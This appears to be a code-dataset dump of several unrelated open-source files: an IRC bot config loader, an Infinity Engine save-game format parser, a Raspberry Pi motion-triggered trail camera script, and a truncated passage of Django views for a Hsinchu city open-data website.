assert_raises(PrivateBucket, S3Client().objects, 'test-pybossa')
|
agpl-3.0
| -8,953,775,506,088,436,000
| 37.041096
| 105
| 0.620274
| false
| 3.413645
| true
| false
| false
|
LastAvenger/labots
|
labots/config/config.py
|
1
|
3322
|
import logging
import yaml
from typing import Dict
from labots.config import checker
from labots.common import meta
# Initialize logging
logger = logging.getLogger(__name__)
class AttrDict(dict):
def __init__(self, *args, **kwargs):
super(AttrDict, self).__init__(*args, **kwargs)
self.__dict__ = self
class Config(AttrDict):
pass
def load_config(raw: str) -> Config:
""" Load config from a yaml format string. """
d = yaml.load(raw)
try:
checker.check(d, [
checker.Item(key = ['log', 'level'],
checkers = [checker.is_str, checker.is_not_empty_str],
default = 'info'),
checker.Item(key = ['log', 'output'],
checkers = [checker.is_str, checker.is_not_empty_str],
default = 'stderr'),
checker.Item(key = ['log', 'color'],
checkers = [checker.is_bool],
default = True),
checker.Item(key = ['irc', 'host'],
checkers = [checker.is_str, checker.is_not_empty_str],
required = True),
checker.Item(key = ['irc', 'port'],
checkers = [checker.is_int, checker.is_port],
default = 6667,
required = True),
checker.Item(key = ['irc', 'tls'],
checkers = [checker.is_bool],
default = False),
checker.Item(key = ['irc', 'tls_verify'],
checkers = [checker.is_bool],
default = True),
checker.Item(key = ['irc', 'server_password'],
checkers = [checker.is_str],
default = None),
checker.Item(key = ['irc', 'nickname'],
checkers = [checker.is_str, checker.is_not_empty_str],
default = meta.name),
checker.Item(key = ['irc', 'username'],
checkers = [checker.is_str, checker.is_not_empty_str],
default = meta.name),
checker.Item(key = ['irc', 'realname'],
checkers = [checker.is_str, checker.is_not_empty_str],
default = meta.url),
checker.Item(key = ['irc', 'user_password'],
checkers = [checker.is_str],
default = None),
checker.Item(key = ['manager', 'bots'],
checkers = [checker.is_str],
required = True),
checker.Item(key = ['manager', 'config'],
checkers = [checker.is_str]),
checker.Item(key = ['server', 'listen'],
checkers = [checker.is_str],
default = meta.default_listen),
checker.Item(key = ['storage', 'db'],
checkers = [checker.is_str],
default = './storage.db'),
checker.Item(key = ['cache', 'db'],
checkers = [checker.is_str],
default = './cache.db'),
])
except (KeyError, ValueError) as e:
raise e
return Config(_build_attr_dict(d))
def _build_attr_dict(d: Dict) -> AttrDict:
""" Recursively convert all dict to AttrDict. """
r = {}
for k, v in d.items():
if isinstance(v, dict):
r[k] = _build_attr_dict(v)
else:
r[k] = v
return AttrDict(r)
|
gpl-3.0
| 1,553,425,372,541,772,800
| 34.340426
| 70
| 0.491872
| false
| 3.968937
| true
| false
| false
|
gemrb/iesh
|
infinity/formats/gam_v22.py
|
1
|
31222
|
# -*-python-*-
# ie_shell.py - Simple shell for Infinity Engine-based game files
# Copyright (C) 2004-2009 by Jaroslav Benkovsky, <edheldil@users.sf.net>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# Conforms to IESDP 18.10.2019
from infinity.format import Format, register_format
class GAM_V22_Format (Format):
header_desc = (
{ 'key': 'signature',
'type': 'STR4',
'off': 0x0000,
'label': 'Signature',
'default': 'GAME' },
{ 'key': 'version',
'type': 'STR4',
'off': 0x0004,
'label': 'Version',
'default': 'V2.2'},
{ 'key': 'game_time',
'type': 'DWORD',
'off': 0x0008,
'label': 'Game time (300 units==1 hour)' },
{ 'key': 'formation',
'type': 'WORD',
'off': 0x000C,
'label': 'Selected formation'},
{ 'key': 'formation_button',
'type': 'WORD',
'off': 0x000E,
'count': 5,
'label': 'Formation button'},
{ 'key': 'gold',
'type': 'DWORD',
'off': 0x0018,
'label': 'Party gold'},
{ 'key': 'pc_cnt0',
'type': 'WORD',
'off': 0x001C,
'label': 'Unknown / PC count'},
{ 'key': 'weather',
'type': 'WORD',
'off': 0x001E,
'mask': { 0x01: 'rain', 0x02: 'snow' },
'label': 'Weather'},
{ 'key': 'pc_off',
'type': 'DWORD',
'off': 0x0020,
'label': 'PC offset'},
{ 'key': 'pc_cnt',
'type': 'DWORD',
'off': 0x0024,
'label': 'PC count (incl. protagonist)'},
{ 'key': 'unknown28',
'type': 'DWORD',
'off': 0x0028,
'label': '(offset to party inventory)'},
{ 'key': 'unknown2C',
'type': 'DWORD',
'off': 0x002C,
'label': '(count of party inventory)'},
{ 'key': 'npc_off',
'type': 'DWORD',
'off': 0x0030,
'label': 'NPC offset'},
{ 'key': 'npc_cnt',
'type': 'DWORD',
'off': 0x0034,
'label': 'NPC count'},
{ 'key': 'global_off',
'type': 'DWORD',
'off': 0x0038,
'label': 'GLOBAL variables offset'},
{ 'key': 'global_cnt',
'type': 'DWORD',
'off': 0x003C,
'label': 'GLOBAL variables count'},
{ 'key': 'main_area',
'type': 'RESREF',
'off': 0x0040,
'label': 'Main area'},
{ 'key': 'familiar_extra_off',
'type': 'DWORD',
'off': 0x0048,
'label': 'Unknown / Familiar extra offset'},
{ 'key': 'journal_entry_cnt',
'type': 'DWORD',
'off': 0x004C,
'label': 'Journal entries count'},
{ 'key': 'journal_entry_off',
'type': 'DWORD',
'off': 0x0050,
'label': 'Journal entries offset'},
{ 'key': 'reputation',
'type': 'DWORD',
'off': 0x0054,
'label': 'Party reputation (*10)'},
{ 'key': 'current_area',
'type': 'RESREF',
'off': 0x0058,
'label': 'Current area'},
{ 'key': 'gui_flags',
'type': 'DWORD',
'off': 0x0060,
'mask': {0x01: 'party_ai_enabled',
0x02: 'text_window_size1',
0x04: 'text_window_size2',
0x08: 'unknown bit3',
0x10: 'hide_gui',
0x20: 'hide_options',
0x40: 'hide_portraits',
0x80: 'hide_automap_notes' },
'label': 'GUI flags'},
{ 'key': 'loading_progress',
'type': 'DWORD',
'off': 0x0064,
'enum': {0: 'restrict_xp_to_bg1_limit',
1: 'restrict_xp_to_totsc_limit',
2: 'restrict_xp_to_soa_limit',
3: 'XNEWAREA.2DA processing to be done',
4: 'XNEWAREA.2DA processing complete',
5: 'TOB active'},
'label': 'Unknown / Loading progress'},
{ 'key': 'familiar_off',
'type': 'DWORD',
'off': 0x0068,
'label': 'Familiar info offset'},
{ 'key': 'stored_location_off',
'type': 'DWORD',
'off': 0x006C,
'label': 'Stored locations offset'},
{ 'key': 'stored_location_cnt',
'type': 'DWORD',
'off': 0x0070,
'label': 'Stored locations count'},
{ 'key': 'game_time',
'type': 'DWORD',
'off': 0x0074,
'label': 'Game time (real seconds)'},
{ 'key': 'pocket_plane_location_off',
'type': 'DWORD',
'off': 0x0078,
'label': 'Pocket plane locations offset'},
{ 'key': 'pocket_plane_location_cnt',
'type': 'DWORD',
'off': 0x007C,
'label': 'Pocket plane locations count'},
{ 'key': 'unknown80',
'type': 'BYTES',
'off': 0x0080,
'size': 52,
'label': 'Unknown 80'},
)
npc_desc = (
{ 'key': 'character_selection',
'type': 'WORD',
'off': 0x0000,
'enum': {0: 'not selected', 1: 'selected', 0x8000: 'dead'},
'label': 'Character selection'},
{ 'key': 'party_order',
'type': 'WORD',
'off': 0x0002,
'label': 'Party order'},
{ 'key': 'cre_off',
'type': 'DWORD',
'off': 0x0004,
'label': 'CRE offset'},
{ 'key': 'cre_size',
'type': 'DWORD',
'off': 0x0008,
'label': 'CRE size'},
{ 'key': 'character_name',
'type': 'STR8',
'off': 0x000C,
'size': 8,
'label': 'Character name'},
{ 'key': 'orientation',
'type': 'DWORD',
'off': 0x0014,
'label': 'Orientation'},
{ 'key': 'current_area',
'type': 'RESREF',
'off': 0x0018,
'label': 'Current area'},
{ 'key': 'x',
'type': 'WORD',
'off': 0x0020,
'label': 'X coordinate'},
{ 'key': 'y',
'type': 'WORD',
'off': 0x0022,
'label': 'Y coordinate'},
{ 'key': 'view_x',
'type': 'WORD',
'off': 0x0024,
'label': 'Viewing rectange X coordinate'},
{ 'key': 'view_y',
'type': 'WORD',
'off': 0x0026,
'label': 'Viewing rectangle Y coordinate'},
{ 'key': 'modal_action',
'type': 'WORD',
'off': 0x0028,
'label': 'Modal action'},
{ 'key': 'happiness',
'type': 'WORD',
'off': 0x002A,
'label': 'Happiness'},
{ 'key': 'num_times_interacted_npc_count',
'type': 'DWORD',
'off': 0x002C,
'count': 24,
'label': 'Num times interacted NPC count (unused)' },
{ 'key': 'quick_weapon_slot_index',
'type': 'WORD',
'off': 0x008C,
'count': 8,
'label': 'Index into slots.ids for main Quick Weapon or offhand, interchanging (FFFF=none)' },
{ 'key': 'quick_slot_usable',
'type': 'WORD',
'off': 0x009C,
'count': 8,
'label': 'Is the quick weapon slot usable?' },
{ 'key': 'quick_spell_resource',
'type': 'RESREF',
'off': 0x00AC,
'count': 9,
'label': 'Quick spell resource' },
{ 'key': 'quick_spell_class',
'type': 'BYTE',
'off': 0x00F4,
'count': 9,
'label': 'Quick spell class' },
{ 'key': 'quick_spell_unknown',
'type': 'BYTE',
'off': 0x00FD,
'count': 1,
'label': '(Quick spell) unknown' },
{ 'key': 'quick_item_slot_index',
'type': 'WORD',
'off': 0x00FE,
'count': 3,
'label': 'Index into slots.ids for Quick Item (FFFF=none)' },
{ 'key': 'quick_item_slot_ability',
'type': 'WORD',
'off': 0x0104,
'count': 3,
'label': 'Quick Item slot usable' },
{ 'key': 'quick_innate',
'type': 'RESREF',
'off': 0x010A,
'count': 9,
'label': 'Quick innate' },
{ 'key': 'quick_song',
'type': 'RESREF',
'off': 0x0152,
'count': 9,
'label': 'Quick song' },
{ 'key': 'quick_slot',
'type': 'RESREF',
'off': 0x019A,
'count': 9,
'label': 'Quick slot' },
{ 'key': 'name',
'type': 'STR32',
'off': 0x01BE,
'label': 'Name' },
{ 'key': 'talkcount',
'type': 'DWORD',
'off': 0x01C2,
'label': 'Talkcount' },
{ 'key': 'stats',
'type': 'BYTES',
'off': 0x01C6,
'size': 116,
'label': 'Stats' },
{ 'key': 'soundset',
'type': 'RESREF',
'off': 0x023A,
'label': 'Sound set' },
{ 'key': 'voiceset',
'type': 'STR32',
'off': 0x0242,
'label': 'Voice set' },
{ 'key': 'unknown_1',
'type': 'DWORD',
'off': 0x0262,
'label': 'Unknown 1' },
{ 'key': 'unknown_2',
'type': 'DWORD',
'off': 0x0266,
'label': 'Unknown 2' },
{ 'key': 'unknown_3',
'type': 'DWORD',
'off': 0x026A,
'label': 'Unknown 3' },
{ 'key': 'expertise',
'type': 'DWORD',
'off': 0x026E,
'label': 'Expertise' },
{ 'key': 'power_attack',
'type': 'DWORD',
'off': 0x0272,
'label': 'Power attack' },
{ 'key': 'arterial_strike',
'type': 'DWORD',
'off': 0x0276,
'label': 'Arterial Strike' },
{ 'key': 'hamstring',
'type': 'DWORD',
'off': 0x027A,
'label': 'Hamstring' },
{ 'key': 'rapid_shot',
'type': 'DWORD',
'off': 0x027E,
'label': 'Rapid Shot' },
{ 'key': 'unknown_4',
'type': 'DWORD',
'off': 0x0282,
'label': 'Unknown 4' },
{ 'key': 'unknown_5',
'type': 'BYTES',
'size': 3,
'off': 0x0286,
'label': 'Unknown 5' },
{ 'key': 'selected_w_slot',
'type': 'WORD',
'off': 0x0289,
'label': 'Selected weapon slot' },
{ 'key': 'unknown_6',
'type': 'BYTES',
'size': 153,
'off': 0x028B,
'label': 'Unknown 6' },
)
pc_desc = npc_desc
global_desc = (
{ 'key': 'name',
'type': 'STR32',
'off': 0x0000,
'label': 'Variable name' },
{ 'key': 'type',
'type': 'WORD',
'off': 0x0020,
# TODO: add mask: (bit 0: int, bit 1: float, bit 2: script name, bit 3: resref, bit 4: strref, bit 5: dword)
'label': 'Type' },
{ 'key': 'refval',
'type': 'WORD',
'off': 0x0022,
'label': 'Ref value' },
{ 'key': 'dwval',
'type': 'DWORD',
'off': 0x0024,
'label': 'DWORD value' },
{ 'key': 'intval',
'type': 'DWORD',
'off': 0x0028,
'label': 'INT value' },
{ 'key': 'dblval',
'type': 'BYTES',
'off': 0x002c,
'size': 8,
'label': 'DOUBLE value' },
{ 'key': 'scrnameval',
'type': 'BYTES',
'off': 0x0033,
'size': 32,
'label': 'Script name value' },
)
journal_entry_desc = (
{ 'key': 'text',
'type': 'STRREF',
'off': 0x0000,
'label': 'Journal text' },
{ 'key': 'time',
'type': 'DWORD',
'off': 0x0004,
'label': 'Time (secs)' },
{ 'key': 'current_chapter',
'type': 'BYTE',
'off': 0x0008,
'label': 'Current chapter number' },
{ 'key': 'unknown09',
'type': 'BYTE',
'off': 0x0009,
'label': 'Unknown 09' },
{ 'key': 'section',
'type': 'BYTE',
'off': 0x000A,
'mask': { 0x01: 'quests', 0x02: 'Completed quests', 0x04: 'Journal info' },
'label': 'Journal section' },
{ 'key': 'location_flag',
'type': 'BYTE',
'off': 0x000B,
'enum': { 0x1F: 'external TOT/TOH', 0xFF: 'internal TLK' },
'label': 'Location flag' },
)
familiar_info_desc = (
{ 'key': 'lg_familiar',
'type': 'RESREF',
'off': 0x0000,
'label': 'Lawful familiar' },
{ 'key': 'ln_familiar',
'type': 'RESREF',
'off': 0x0008,
'label': 'Lawful neutral familiar' },
{ 'key': 'le_familiar',
'type': 'RESREF',
'off': 0x0010,
'label': 'Lawful evil familiar' },
{ 'key': 'ng_familiar',
'type': 'RESREF',
'off': 0x0018,
'label': 'Neutral good familiar' },
{ 'key': 'nn_familiar',
'type': 'RESREF',
'off': 0x0020,
'label': 'True neutral familiar' },
{ 'key': 'ne_familiar',
'type': 'RESREF',
'off': 0x0028,
'label': 'Neutral evil familiar' },
{ 'key': 'cg_familiar',
'type': 'RESREF',
'off': 0x0030,
'label': 'Chaotic familiar' },
{ 'key': 'cn_familiar',
'type': 'RESREF',
'off': 0x0038,
'label': 'Chaotic neutral familiar' },
{ 'key': 'ce_familiar',
'type': 'RESREF',
'off': 0x0040,
'label': 'Chaotic evil familiar' },
{ 'key': 'unknown48',
'type': 'DWORD',
'off': 0x0048,
'label': 'Unknown 48' },
{ 'key': 'lg_1_familiar_cnt',
'type': 'DWORD',
'off': 0x004C,
'label': 'LG level 1 familiar count' },
{ 'key': 'lg_2_familiar_cnt',
'type': 'DWORD',
'off': 0x0050,
'label': 'LG level 2 familiar count' },
{ 'key': 'lg_3_familiar_cnt',
'type': 'DWORD',
'off': 0x0054,
'label': 'LG level 3 familiar count' },
{ 'key': 'lg_4_familiar_cnt',
'type': 'DWORD',
'off': 0x0058,
'label': 'LG level 4 familiar count' },
{ 'key': 'lg_5_familiar_cnt',
'type': 'DWORD',
'off': 0x005C,
'label': 'LG level 5 familiar count' },
{ 'key': 'lg_6_familiar_cnt',
'type': 'DWORD',
'off': 0x0060,
'label': 'LG level 6 familiar count' },
{ 'key': 'lg_7_familiar_cnt',
'type': 'DWORD',
'off': 0x0064,
'label': 'LG level 7 familiar count' },
{ 'key': 'lg_8_familiar_cnt',
'type': 'DWORD',
'off': 0x0068,
'label': 'LG level 8 familiar count' },
{ 'key': 'lg_9_familiar_cnt',
'type': 'DWORD',
'off': 0x006C,
'label': 'LG level 9 familiar count' },
{ 'key': 'ln_1_familiar_cnt',
'type': 'DWORD',
'off': 0x0070,
'label': 'LN level 1 familiar count' },
{ 'key': 'ln_2_familiar_cnt',
'type': 'DWORD',
'off': 0x0074,
'label': 'LN level 2 familiar count' },
{ 'key': 'ln_3_familiar_cnt',
'type': 'DWORD',
'off': 0x0078,
'label': 'LN level 3 familiar count' },
{ 'key': 'ln_4_familiar_cnt',
'type': 'DWORD',
'off': 0x007C,
'label': 'LN level 4 familiar count' },
{ 'key': 'ln_5_familiar_cnt',
'type': 'DWORD',
'off': 0x0080,
'label': 'LN level 5 familiar count' },
{ 'key': 'ln_6_familiar_cnt',
'type': 'DWORD',
'off': 0x0084,
'label': 'LN level 6 familiar count' },
{ 'key': 'ln_7_familiar_cnt',
'type': 'DWORD',
'off': 0x0088,
'label': 'LN level 7 familiar count' },
{ 'key': 'ln_8_familiar_cnt',
'type': 'DWORD',
'off': 0x008C,
'label': 'LN level 8 familiar count' },
{ 'key': 'ln_9_familiar_cnt',
'type': 'DWORD',
'off': 0x0090,
'label': 'LN level 9 familiar count' },
{ 'key': 'cg_1_familiar_cnt',
'type': 'DWORD',
'off': 0x0094,
'label': 'CG level 1 familiar count' },
{ 'key': 'cg_2_familiar_cnt',
'type': 'DWORD',
'off': 0x0098,
'label': 'CG level 2 familiar count' },
{ 'key': 'cg_3_familiar_cnt',
'type': 'DWORD',
'off': 0x009C,
'label': 'CG level 3 familiar count' },
{ 'key': 'cg_4_familiar_cnt',
'type': 'DWORD',
'off': 0x00A0,
'label': 'CG level 4 familiar count' },
{ 'key': 'cg_5_familiar_cnt',
'type': 'DWORD',
'off': 0x00A4,
'label': 'CG level 5 familiar count' },
{ 'key': 'cg_6_familiar_cnt',
'type': 'DWORD',
'off': 0x00A8,
'label': 'CG level 6 familiar count' },
{ 'key': 'cg_7_familiar_cnt',
'type': 'DWORD',
'off': 0x00AC,
'label': 'CG level 7 familiar count' },
{ 'key': 'cg_8_familiar_cnt',
'type': 'DWORD',
'off': 0x00B0,
'label': 'CG level 8 familiar count' },
{ 'key': 'cg_9_familiar_cnt',
'type': 'DWORD',
'off': 0x00B4,
'label': 'CG level 9 familiar count' },
{ 'key': 'ng_1_familiar_cnt',
'type': 'DWORD',
'off': 0x00B8,
'label': 'NG level 1 familiar count' },
{ 'key': 'ng_2_familiar_cnt',
'type': 'DWORD',
'off': 0x00BC,
'label': 'NG level 2 familiar count' },
{ 'key': 'ng_3_familiar_cnt',
'type': 'DWORD',
'off': 0x00C0,
'label': 'NG level 3 familiar count' },
{ 'key': 'ng_4_familiar_cnt',
'type': 'DWORD',
'off': 0x00C4,
'label': 'NG level 4 familiar count' },
{ 'key': 'ng_5_familiar_cnt',
'type': 'DWORD',
'off': 0x00C8,
'label': 'NG level 5 familiar count' },
{ 'key': 'ng_6_familiar_cnt',
'type': 'DWORD',
'off': 0x00CC,
'label': 'NG level 6 familiar count' },
{ 'key': 'ng_7_familiar_cnt',
'type': 'DWORD',
'off': 0x00D0,
'label': 'NG level 7 familiar count' },
{ 'key': 'ng_8_familiar_cnt',
'type': 'DWORD',
'off': 0x00D4,
'label': 'NG level 8 familiar count' },
{ 'key': 'ng_9_familiar_cnt',
'type': 'DWORD',
'off': 0x00D8,
'label': 'NG level 9 familiar count' },
{ 'key': 'tn_1_familiar_cnt',
'type': 'DWORD',
'off': 0x00DC,
'label': 'TN level 1 familiar count' },
{ 'key': 'tn_2_familiar_cnt',
'type': 'DWORD',
'off': 0x00E0,
'label': 'TN level 2 familiar count' },
{ 'key': 'tn_3_familiar_cnt',
'type': 'DWORD',
'off': 0x00E4,
'label': 'TN level 3 familiar count' },
{ 'key': 'tn_4_familiar_cnt',
'type': 'DWORD',
'off': 0x00E8,
'label': 'TN level 4 familiar count' },
{ 'key': 'tn_5_familiar_cnt',
'type': 'DWORD',
'off': 0x00EC,
'label': 'TN level 5 familiar count' },
{ 'key': 'tn_6_familiar_cnt',
'type': 'DWORD',
'off': 0x00F0,
'label': 'TN level 6 familiar count' },
{ 'key': 'tn_7_familiar_cnt',
'type': 'DWORD',
'off': 0x00F4,
'label': 'TN level 7 familiar count' },
{ 'key': 'tn_8_familiar_cnt',
'type': 'DWORD',
'off': 0x00F8,
'label': 'TN level 8 familiar count' },
{ 'key': 'tn_9_familiar_cnt',
'type': 'DWORD',
'off': 0x00FC,
'label': 'TN level 9 familiar count' },
{ 'key': 'ne_1_familiar_cnt',
'type': 'DWORD',
'off': 0x0100,
'label': 'NE level 1 familiar count' },
{ 'key': 'ne_2_familiar_cnt',
'type': 'DWORD',
'off': 0x0104,
'label': 'NE level 2 familiar count' },
{ 'key': 'ne_3_familiar_cnt',
'type': 'DWORD',
'off': 0x0108,
'label': 'NE level 3 familiar count' },
{ 'key': 'ne_4_familiar_cnt',
'type': 'DWORD',
'off': 0x010C,
'label': 'NE level 4 familiar count' },
{ 'key': 'ne_5_familiar_cnt',
'type': 'DWORD',
'off': 0x0110,
'label': 'NE level 5 familiar count' },
{ 'key': 'ne_6_familiar_cnt',
'type': 'DWORD',
'off': 0x0114,
'label': 'NE level 6 familiar count' },
{ 'key': 'ne_7_familiar_cnt',
'type': 'DWORD',
'off': 0x0118,
'label': 'NE level 7 familiar count' },
{ 'key': 'ne_8_familiar_cnt',
'type': 'DWORD',
'off': 0x011C,
'label': 'NE level 8 familiar count' },
{ 'key': 'ne_9_familiar_cnt',
'type': 'DWORD',
'off': 0x0120,
'label': 'NE level 9 familiar count' },
{ 'key': 'le_1_familiar_cnt',
'type': 'DWORD',
'off': 0x0124,
'label': 'LE level 1 familiar count' },
{ 'key': 'le_2_familiar_cnt',
'type': 'DWORD',
'off': 0x0128,
'label': 'LE level 2 familiar count' },
{ 'key': 'le_3_familiar_cnt',
'type': 'DWORD',
'off': 0x012C,
'label': 'LE level 3 familiar count' },
{ 'key': 'le_4_familiar_cnt',
'type': 'DWORD',
'off': 0x0130,
'label': 'LE level 4 familiar count' },
{ 'key': 'le_5_familiar_cnt',
'type': 'DWORD',
'off': 0x0134,
'label': 'LE level 5 familiar count' },
{ 'key': 'le_6_familiar_cnt',
'type': 'DWORD',
'off': 0x0138,
'label': 'LE level 6 familiar count' },
{ 'key': 'le_7_familiar_cnt',
'type': 'DWORD',
'off': 0x013C,
'label': 'LE level 7 familiar count' },
{ 'key': 'le_8_familiar_cnt',
'type': 'DWORD',
'off': 0x0140,
'label': 'LE level 8 familiar count' },
{ 'key': 'le_9_familiar_cnt',
'type': 'DWORD',
'off': 0x0144,
'label': 'LE level 9 familiar count' },
{ 'key': 'cn_1_familiar_cnt',
'type': 'DWORD',
'off': 0x0148,
'label': 'CN level 1 familiar count' },
{ 'key': 'cn_2_familiar_cnt',
'type': 'DWORD',
'off': 0x014C,
'label': 'CN level 2 familiar count' },
{ 'key': 'cn_3_familiar_cnt',
'type': 'DWORD',
'off': 0x0150,
'label': 'CN level 3 familiar count' },
{ 'key': 'cn_4_familiar_cnt',
'type': 'DWORD',
'off': 0x0154,
'label': 'CN level 4 familiar count' },
{ 'key': 'cn_5_familiar_cnt',
'type': 'DWORD',
'off': 0x0158,
'label': 'CN level 5 familiar count' },
{ 'key': 'cn_6_familiar_cnt',
'type': 'DWORD',
'off': 0x015C,
'label': 'CN level 6 familiar count' },
{ 'key': 'cn_7_familiar_cnt',
'type': 'DWORD',
'off': 0x0160,
'label': 'CN level 7 familiar count' },
{ 'key': 'cn_8_familiar_cnt',
'type': 'DWORD',
'off': 0x0164,
'label': 'CN level 8 familiar count' },
{ 'key': 'cn_9_familiar_cnt',
'type': 'DWORD',
'off': 0x0168,
'label': 'CN level 9 familiar count' },
{ 'key': 'ce_1_familiar_cnt',
'type': 'DWORD',
'off': 0x016C,
'label': 'CE level 1 familiar count' },
{ 'key': 'ce_2_familiar_cnt',
'type': 'DWORD',
'off': 0x0170,
'label': 'CE level 2 familiar count' },
{ 'key': 'ce_3_familiar_cnt',
'type': 'DWORD',
'off': 0x0174,
'label': 'CE level 3 familiar count' },
{ 'key': 'ce_4_familiar_cnt',
'type': 'DWORD',
'off': 0x0178,
'label': 'CE level 4 familiar count' },
{ 'key': 'ce_5_familiar_cnt',
'type': 'DWORD',
'off': 0x017C,
'label': 'CE level 5 familiar count' },
{ 'key': 'ce_6_familiar_cnt',
'type': 'DWORD',
'off': 0x0180,
'label': 'CE level 6 familiar count' },
{ 'key': 'ce_7_familiar_cnt',
'type': 'DWORD',
'off': 0x0184,
'label': 'CE level 7 familiar count' },
{ 'key': 'ce_8_familiar_cnt',
'type': 'DWORD',
'off': 0x0188,
'label': 'CE level 8 familiar count' },
{ 'key': 'ce_9_familiar_cnt',
'type': 'DWORD',
'off': 0x018C,
'label': 'CE level 9 familiar count' },
)
stored_location_desc = (
{ 'key': 'area',
'type': 'RESREF',
'off': 0x0000,
'label': 'Area' },
{ 'key': 'x',
'type': 'WORD',
'off': 0x0008,
'label': 'X coordinate' },
{ 'key': 'y',
'type': 'WORD',
'off': 0x000A,
'label': 'Y coordinate' },
)
pocket_plane_location_desc = stored_location_desc
def __init__ (self):
Format.__init__ (self)
self.expect_signature = 'GAME'
self.pc_list = []
self.npc_list = []
self.global_list = []
self.journal_entry_list = []
self.stored_location_list = []
self.pocket_plane_location_list = []
def read (self, stream):
self.read_header (stream)
self.read_list (stream, 'pc')
self.read_list (stream, 'npc')
self.read_list (stream, 'global')
self.read_list (stream, 'journal_entry')
self.read_list (stream, 'stored_location')
self.read_list (stream, 'pocket_plane_location')
obj = {}
self.read_struc (stream, self.header['familiar_off'], self.familiar_info_desc, obj)
self.familiar_info = obj
# FIXME: familiar info
def update (self):
off = self.size_struc (self.header_desc)
self.header['pc_cnt'] = len (self.pc_list)
self.header['pc_off'] = off
off += self.size_struc (self.pc_desc) * len (self.pc_list)
pass
def write (self, stream):
self.write_header (stream)
off = self.write_list (stream, off, 'actor')
raise RuntimeError ("Not implemented")
def printme (self):
self.print_header ()
self.print_list ('pc')
self.print_list ('npc')
self.print_list ('global')
self.print_list ('journal_entry')
self.print_list ('stored_location')
self.print_list ('pocket_plane_location')
self.print_struc (self.familiar_info, self.familiar_info_desc)
register_format (GAM_V22_Format, signature='GAMEV2.2', extension='GAM', name=('GAM', 'GAME'), type=0x3f5)
|
gpl-2.0
| 2,371,619,244,215,804,400
| 28.877512
| 123
| 0.394818
| false
| 3.612403
| false
| false
| false
|
jmcallister47/trailcam
|
night/motion-camera.py
|
1
|
1673
|
#!/usr/bin/env python
'''Script that manages motion sensor, camera module and light
When motion is detected, turn on infrared light, take and save picture, turn off light
Maximum of one picture every 4 seconds'''
from gpiozero import MotionSensor
import subprocess
from datetime import datetime
from time import sleep
import RPi.GPIO as GPIO
def main():
sensor = MotionSensor(4)
writeToLogFile("STARTED NIGHT MODE AT " + str(datetime.now()))
GPIO.setmode(GPIO.BCM)
GPIO.setup(5, GPIO.OUT) #setup light trigger
while True:
if sensor.motion_detected:
turnOnLights()
print "Lights on"
sleep(1)
takePicture()
print("Take picture")
#sleep(3)
turnOffLights()
print("Turn off lights")
sleep(3)
writeToLogFile("Took one picture at " + str(datetime.now()))
'''Turns on IR Lights indefinetely'''
def turnOnLights():
GPIO.output(5, 0)
'''Turns off all lights (IR and LED)'''
def turnOffLights():
GPIO.output(5, 1)
'''Takes a picture and saves it with timestamp'''
def takePicture():
now = datetime.now()
timestamp = str(now.month).zfill(2) + "-" + str(now.day).zfill(2) + "-" + str(now.year) + "-" + \
str(now.hour).zfill(2) + ":" + str(now.minute).zfill(2) + ":" + str(now.second).zfill(2)
filename = timestamp + "-night.jpg"
subprocess.call(["sudo", "raspistill", "-o", "/home/pi/trailcam/tmp/" + filename])
def writeToLogFile(arg):
file = open("/home/pi/trailcam/night/log.txt", "a");
file.write(arg + "\n")
file.close();
if __name__ == "__main__":
main()
|
gpl-3.0
| -4,917,927,044,453,764,000
| 31.803922
| 104
| 0.608488
| false
| 3.492693
| false
| false
| false
|
kaochiuan/HsinchuCityWebsite
|
HsinchuCityWebsite/HsinchuCityWebsite/app/views.py
|
1
|
19767
|
"""
Definition of views.
"""
from django.shortcuts import render
from django.http import HttpResponse
from django.http import HttpRequest
from django.template import RequestContext
from datetime import datetime
from datetime import date
from django.http.response import HttpResponse
import urllib.request
import json
import urllib
from urllib.request import Request
from app.models import TempleInfo, TempleManager, CultureActiviyInfo, CityNewsItem, AnamialHospitalReputation
from app.templateModels import *
from django.contrib.sites import requests
from django.views.decorators.csrf import csrf_protect
from django.core import serializers
from app.ReputationService import ReputationService
from django.shortcuts import redirect
def favicon_redirect(request):
return redirect('/static/app/images/favi.ico')
def home(request):
"""Renders the home page."""
assert isinstance(request, HttpRequest)
return render(request,
'app/index.html',
context_instance = RequestContext(request,
{
'title':'首頁',
'year':datetime.now().year,
}))
def contact(request):
"""Renders the contact page."""
assert isinstance(request, HttpRequest)
return render(request,
'app/contact.html',
context_instance = RequestContext(request,
{
'title':'Contact',
'message':'Your contact page.',
'year':datetime.now().year,
}))
def about(request):
"""Renders the about page."""
assert isinstance(request, HttpRequest)
return render(request,
'app/about.html',
context_instance = RequestContext(request,
{
'title':'與Opendata平台同步資料',
'message':'Application data sync',
'year':datetime.now().year,
}))
def templeMaps(request):
assert isinstance(request, HttpRequest)
regions = TempleInfo.objects.getDistinctRegion()
belief = TempleInfo.objects.getDistinctReligiousBelief()
regionLst = []
beliefLst = []
for r in regions:
regionLst.append(r.locateRegion)
for b in belief:
beliefLst.append(b.religiousBelief)
regionLst = set(regionLst)
beliefLst = set(beliefLst)
return render(request,
'app/templeMaps.html',
context_instance = RequestContext(request,
{
'title':'求人不如求神',
'regions':regionLst,
'belief':beliefLst,
}))
@csrf_protect
def filterTemple(request):
assert isinstance(request, HttpRequest)
region = request.POST['region']
belief = request.POST['belief']
filterTemples = TempleInfo.objects.filterByDetail(region,belief)
data = serializers.serialize("json", filterTemples, fields=('name','masterGod','address','latitude','longitude'))
decoded = json.loads(data)
return HttpResponse(json.dumps({"status": "Success", "templeInfo": decoded}),
content_type="application/json")
def allMyGodsInHsinchu(request):
assert isinstance(request, HttpRequest)
req = Request("http://opendata.hccg.gov.tw/dataset/480911dd-6eea-4f97-a7e8-334b32cc8f6b/resource/ee12c072-e8aa-4be1-8179-f1c9606198f3/download/20150304091340575.json")
try:
response = urllib.request.urlopen(req)
ur = response.readall().decode('utf-8-sig')
j_obj = json.loads(ur)
templeLst = []
for jsonObj in j_obj:
address = jsonObj[u"寺廟所在地"]
